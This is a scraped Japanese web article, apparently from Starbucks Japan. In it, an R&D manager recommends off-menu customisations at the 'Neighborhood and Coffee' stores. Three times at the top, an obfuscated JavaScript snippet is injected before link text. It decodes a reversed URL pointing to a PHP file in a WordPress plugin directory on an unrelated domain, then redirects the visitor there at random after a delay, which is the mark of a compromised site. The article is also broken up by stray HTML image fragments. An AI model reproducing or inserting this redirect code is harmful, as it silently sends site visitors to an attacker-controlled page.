$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tokyo/12710″>第2回 ネイバーフッド アンド コーヒーについて
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tokyo/12859″>第4回 オレンジブラウニー、レモンケーキ、クレーム ブリュレ、青森産りんごのアップルパイ with アイスクリーム
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tokyo/12921″>第6回 バナナ チョコレート & アイスクリーム
今回は「おすすめカスタマイズ」についてお話をうかがいます。そもそもカスタマイズというのは、通常店でいう受取口のそばにある種類豊富なお砂糖などのことですか?

清水それだけではありません。スターバックスはそもそも、注文時にミルクを低脂肪乳や豆乳に変更したり、フレーバーシロップを加えたりというカスタマイズのチョイスに幅が広くて、ご好評いただいています。ネイバーフッドではさらにカスタマイズを徹底化しました。メニューの最終ページにカスタマイズアイテムがメニューとして載っていますから見てみてください。

tom_01.jpg” alt=”starbucks_custom_01″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12948″ />

シロップやソースの追加だけじゃなくて、ラズベリーとかクラッシュアップルも!アーモンドやカカオニブといった食感を変えるものもありますね。これらを自分のコーヒーやビバレッジメニューに追加すればいいんですね。

清水そうなんですけれど、ネイバーフッドではもっと大胆なカスタマイズがしょっちゅう行われています。

僕個人が気に入ってるのは、①スチームミルクにホームメイドバニラシロップをプラス。これって、実はホームメイド バニラ ラテのエスプレッソ抜きでもあります。見た目はごく普通のホットミルクなんですが、バニラシロップも手作りしていますから、すごく風味がいいんです。

tom_02.jpg” alt=”starbucks_custom_02″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12949″ />

では、いただきますね。あっ、甘さが優しくてあったまる! バニラの香りに癒やされますね〜。このバニラシロップをさらにキャラメルソースに変更したり、アーモンドを加えたりしてもいいというわけですか!これは楽しい。

tom_03.jpg” alt=”starbucks_custom_03″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12950″ />

清水あとは、②ダブルエスプレッソとシロップ、氷をシェイクする「シェケラート」にアイスクリームをのせるのはいかがですか?

tom_04.jpg” alt=”starbucks_custom_04″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12951″ />

tom_05.jpg” alt=”starbucks_custom_05″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12952″ />

アイスクリームがほろ苦いエスプレッソと少しずつ混ざっていくところが素敵ですね。時間の移ろいでおいしさが変化するのって、すごくネイバーフッドらしいです。ちょっとコーヒーフロートみたい。

清水あとは、第6回でご紹介した「 tom_06.jpg” alt=”starbucks_custom_06″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12953″ />

たしかに完成度が高い“裏メニュー”ですね。主役のバナナとチョコレートがないですから、もはやまったく違うわけですが、ベリーの甘酸っぱさがおいしくて、普通に注文したくなります。

tom_07.jpg” alt=”starbucks_custom_07″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12954″ />

品揃えだけでなく、注文しやすい環境。

tom_08.jpg” alt=”starbucks_custom_08″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12955″ />

清水開発担当としては実験大好きですから、カスタマイズのアイディアは無限にあるんですよね。メニューにはないんですが、④アイスクリームを単品で注文できて、そこにラズベリーとはちみつ。これを食べながら白ワインを飲むのが最高なんです。夜ならレッドフックESB/IPAというビールにエスプレッソショットを入れて飲んだりもしますよ。

tom_09.jpg” alt=”starbucks_custom_09″ width=”1860″ height=”1232″ class=”alignnone size-full wp-image-12956″ />

ついにビールまで!どこまでもOKなんですね。

清水そうですよ。もっとトリッキーなことを言っちゃえば、④グラスにブラウニーを入れてアイスクリームとエスプレッソショットを入れればちょっとしたサンデーだってできますから。

思いついたカスタマイズをお願いできるコミュニケーションの環境も大切になりますね。

清水そこがネイバーフッドの腕の見せどころなんですよ。コミュニケーション能力の高いバリスタたちが揃っていますから、何度も来ていただけたら嗜好もわかってくる。そうしたら、新しいものを試したそうなお客さまに「これにアイスクリームを入れてみたらどうでしょう」とか「僕がいつもやるカスタマイズなんですけど……」とご紹介できるんです。

カスタマイズをしていくとメニューの可能性が無限に広がりますね。近所にあって自分の究極の一杯を作り上げたいと思っちゃいます。

清水今回までいろいろなメニューをご紹介してきましたが、実はカスタマイズがいちばんネイバーフッドらしいかもしれませんね。ぜひ、自由にお試しください!

今回紹介したおすすめカスタマイズ4選

①「ホームメイド バニラ ラテ」のエスプレッソ抜き
②「シェケラート」にアイスクリームをのせる
③「バナナチョコレート & アイスクリーム」からラズベリーとアーモンドクラッシュとはちみつをかける
④アイスクリームを単品で注文できて、そこにラズベリーとはちみつをかける

■ 教えてくれた人

清水 拓さん

スターバックス コーヒー ジャパン株式会社 プロダクトイノベーション部 R&Dチーム マネージャー。通常店のビバレッジメニュー開発を経て、現在は「スターバックス ネイバーフッド アンド コーヒー」「スターバックス イブニングス」のフード・ビバレッジメニュー開発を担当。